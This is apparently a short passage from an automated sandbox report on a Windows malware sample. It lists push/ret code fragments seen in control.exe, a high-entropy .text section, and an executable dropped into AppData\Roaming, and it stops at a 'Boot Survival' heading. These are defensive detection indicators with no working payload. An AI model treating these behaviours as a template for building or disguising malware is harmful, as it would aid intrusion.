          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0310C9C8 push dword ptr [ECF9F4C6h]; ret 8_2_0310C9EA
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0310508E push ebp; iretd 8_2_0310508F
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_030FEEAA push esp; retf 8_2_030FEEAF
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_03104DDA pushfd ; retf 8_2_03104DDB
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0310B402 push eax; ret 8_2_0310B408
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0310B40B push eax; ret 8_2_0310B472
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0310B46C push eax; ret 8_2_0310B472
          Source: initial sampleStatic PE information: section name: .text entropy: 7.87325624696
          Source: initial sampleStatic PE information: section name: .text entropy: 7.87325624696
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeFile created: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exeJump to dropped file

          Boot Survival: